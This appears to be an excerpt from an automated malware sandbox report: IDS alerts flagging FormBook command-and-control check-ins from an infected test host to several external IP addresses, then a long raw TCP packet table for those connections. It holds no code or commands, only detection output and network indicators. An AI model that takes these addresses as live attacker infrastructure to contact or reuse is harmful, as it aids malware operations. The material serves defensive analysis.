                                                                                                                            2024-10-19T12:58:31.054944+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029199.59.243.22780TCP
                                                                                                                            2024-10-19T12:58:33.656681+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450030199.59.243.22780TCP
                                                                                                                            2024-10-19T12:58:36.149413+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450031199.59.243.22780TCP
                                                                                                                            2024-10-19T12:58:41.958210+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032172.67.196.9080TCP
                                                                                                                            2024-10-19T12:58:44.518082+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450033172.67.196.9080TCP
                                                                                                                            2024-10-19T12:58:47.127683+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450034172.67.196.9080TCP
                                                                                                                            2024-10-19T12:58:49.613095+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450035172.67.196.9080TCP
                                                                                                                            2024-10-19T12:58:55.287439+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500363.33.130.19080TCP
                                                                                                                            2024-10-19T12:58:57.831784+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500373.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:00.399260+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500383.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:02.923816+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500393.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:09.146277+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500403.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:12.045609+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500413.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:13.710883+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500423.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:16.264611+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500433.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:22.826779+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500443.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:25.373667+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500453.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:27.045458+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500463.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:29.649501+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500473.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:36.817387+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450048129.226.56.20080TCP
                                                                                                                            2024-10-19T12:59:39.187204+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450049129.226.56.20080TCP
                                                                                                                            2024-10-19T12:59:42.151328+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450050129.226.56.20080TCP
                                                                                                                            2024-10-19T12:59:44.717271+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450051129.226.56.20080TCP
                                                                                                                            2024-10-19T12:59:50.927787+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005284.32.84.3280TCP
                                                                                                                            2024-10-19T12:59:53.527213+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005384.32.84.3280TCP
                                                                                                                            2024-10-19T12:59:56.064035+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005484.32.84.3280TCP
                                                                                                                            2024-10-19T12:59:58.617220+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45005584.32.84.3280TCP
                                                                                                                            2024-10-19T13:00:04.340210+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500563.33.130.19080TCP
                                                                                                                            2024-10-19T13:00:07.583242+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500573.33.130.19080TCP
                                                                                                                            2024-10-19T13:00:10.114991+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500583.33.130.19080TCP
                                                                                                                            2024-10-19T13:00:13.330521+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500593.33.130.19080TCP

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Oct 19, 2024 12:57:03.331604958 CEST4976280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:03.336914062 CEST80497623.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:03.336987972 CEST4976280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:03.347311974 CEST4976280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:03.353190899 CEST80497623.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:04.000720978 CEST80497623.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:04.005402088 CEST80497623.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:04.005503893 CEST4976280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:04.007432938 CEST4976280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:04.015528917 CEST80497623.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:19.076302052 CEST4984380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:19.081573009 CEST8049843172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:19.081655025 CEST4984380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:19.093046904 CEST4984380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:19.098555088 CEST8049843172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:19.980660915 CEST8049843172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:19.980705976 CEST8049843172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:19.980760098 CEST4984380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:19.983298063 CEST8049843172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:19.983356953 CEST4984380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:20.608316898 CEST4984380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:21.633085012 CEST4985880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:21.639544010 CEST8049858172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:21.639636040 CEST4985880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:21.651331902 CEST4985880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:21.656749964 CEST8049858172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:22.531109095 CEST8049858172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:22.531152010 CEST8049858172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:22.531219959 CEST4985880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:22.532138109 CEST8049858172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:22.532193899 CEST4985880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:23.155241013 CEST4985880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:24.174173117 CEST4987380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:24.179203033 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:24.179321051 CEST4987380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:24.191217899 CEST4987380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:24.196182013 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:24.196197987 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:24.196300983 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:24.196324110 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:24.196340084 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:24.196382046 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:24.196453094 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:24.196465969 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:24.196480036 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:25.081526995 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:25.081568003 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:25.081676960 CEST4987380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:25.083318949 CEST8049873172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:25.083426952 CEST4987380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:25.702169895 CEST4987380192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:26.721190929 CEST4988880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:26.726074934 CEST8049888172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:26.726177931 CEST4988880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:26.733472109 CEST4988880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:26.738255024 CEST8049888172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:27.617151976 CEST8049888172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:27.617203951 CEST8049888172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:27.617419004 CEST4988880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:27.618802071 CEST8049888172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:27.618850946 CEST4988880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:27.620007992 CEST4988880192.168.2.4172.67.181.186
                                                                                                                            Oct 19, 2024 12:57:27.624764919 CEST8049888172.67.181.186192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:32.902266026 CEST4991980192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:32.907174110 CEST8049919104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:32.907282114 CEST4991980192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:32.919644117 CEST4991980192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:32.925061941 CEST8049919104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:33.502212048 CEST8049919104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:33.502465963 CEST8049919104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:33.502532959 CEST4991980192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:34.436466932 CEST4991980192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:35.455064058 CEST4993580192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:35.460505009 CEST8049935104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:35.460582018 CEST4993580192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:35.471951962 CEST4993580192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:35.476887941 CEST8049935104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:36.075556993 CEST8049935104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:36.076064110 CEST8049935104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:36.076138020 CEST4993580192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:36.983329058 CEST4993580192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:38.003401995 CEST4995080192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:38.010214090 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.010286093 CEST4995080192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:38.022330046 CEST4995080192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:38.028836966 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.028847933 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.028856993 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.028865099 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.028875113 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.028886080 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.028893948 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.029546022 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.029553890 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.644953012 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.646564960 CEST8049950104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:38.646681070 CEST4995080192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:39.530169010 CEST4995080192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:40.548742056 CEST4996580192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:40.553667068 CEST8049965104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:40.553781986 CEST4996580192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:40.561228991 CEST4996580192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:40.566179037 CEST8049965104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:41.162436962 CEST8049965104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:41.162723064 CEST8049965104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:41.162826061 CEST4996580192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:41.165450096 CEST4996580192.168.2.4104.223.44.195
                                                                                                                            Oct 19, 2024 12:57:41.170335054 CEST8049965104.223.44.195192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:46.200900078 CEST4999680192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:46.205924034 CEST8049996203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:46.206018925 CEST4999680192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:46.217314005 CEST4999680192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:46.222132921 CEST8049996203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:46.878372908 CEST8049996203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:46.915402889 CEST8049996203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:46.915592909 CEST4999680192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:47.733253956 CEST4999680192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:48.752000093 CEST5001280192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:48.756932974 CEST8050012203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:48.757025003 CEST5001280192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:48.768079042 CEST5001280192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:48.772898912 CEST8050012203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:49.461445093 CEST8050012203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:49.499473095 CEST8050012203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:49.499536991 CEST5001280192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:50.280272961 CEST5001280192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:51.299103975 CEST5001880192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:51.323631048 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.323760033 CEST5001880192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:51.334908009 CEST5001880192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:51.339869022 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339879990 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339893103 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339945078 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339955091 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339972019 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339982033 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339991093 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.340002060 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:52.037790060 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:52.073067904 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:52.075550079 CEST5001880192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:52.843013048 CEST5001880192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:53.866977930 CEST5001980192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:53.872073889 CEST8050019203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:53.872282982 CEST5001980192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:53.879705906 CEST5001980192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:53.884810925 CEST8050019203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:54.578121901 CEST8050019203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:54.615740061 CEST8050019203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:54.615906954 CEST5001980192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:54.616772890 CEST5001980192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:54.625040054 CEST8050019203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:59.645282984 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:59.650127888 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:59.650192976 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:59.666585922 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:59.671456099 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:00.290718079 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:00.290771961 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:01.171504021 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:01.483194113 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.092540026 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.185935020 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.185952902 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.185966015 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.186021090 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.186163902 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.190450907 CEST5002180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.195308924 CEST80500213.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.195379019 CEST5002180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.207951069 CEST5002180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.212816000 CEST80500213.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.812414885 CEST80500213.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.812515974 CEST5002180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:03.717607975 CEST5002180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:03.722523928 CEST80500213.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.739464998 CEST5002280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:04.744364977 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.747522116 CEST5002280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:04.758877993 CEST5002280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:04.763930082 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.763945103 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.763969898 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.763983011 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.763997078 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.764249086 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.764261007 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.764317989 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.764329910 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:05.380330086 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:05.380413055 CEST5002280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:06.264447927 CEST5002280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:06.269635916 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:07.283636093 CEST5002380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:07.288542986 CEST80500233.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:07.291656017 CEST5002380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:07.298891068 CEST5002380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:07.303739071 CEST80500233.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:07.936068058 CEST80500233.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:07.936851978 CEST80500233.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:07.936908007 CEST5002380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:07.944040060 CEST5002380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:07.948867083 CEST80500233.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:13.966286898 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:13.971446991 CEST8050024221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:13.971512079 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:13.986521959 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:13.992224932 CEST8050024221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:14.948312998 CEST8050024221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:14.950340986 CEST8050024221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:14.950484037 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:15.132085085 CEST8050024221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:15.134773016 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:15.498907089 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:16.518951893 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:16.523957014 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:16.524068117 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:16.537206888 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:16.542169094 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:17.484088898 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:17.484107971 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:17.485657930 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:17.507009983 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:17.507114887 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:17.667673111 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:17.667727947 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:18.045660973 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:19.065431118 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:19.070409060 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.070492029 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:19.082093000 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:19.086929083 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.086988926 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.086997986 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087006092 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087138891 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087198019 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087207079 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087223053 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087323904 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:20.029829025 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:20.030311108 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:20.030369043 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:20.213624001 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:20.213689089 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:20.593723059 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:21.613058090 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:21.617959023 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:21.618031979 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:21.626403093 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:21.631225109 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:22.594252110 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:22.594269991 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:22.594449043 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:22.778184891 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:22.781888008 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:22.782716036 CEST5002780192.168.2.4221.128.225.57
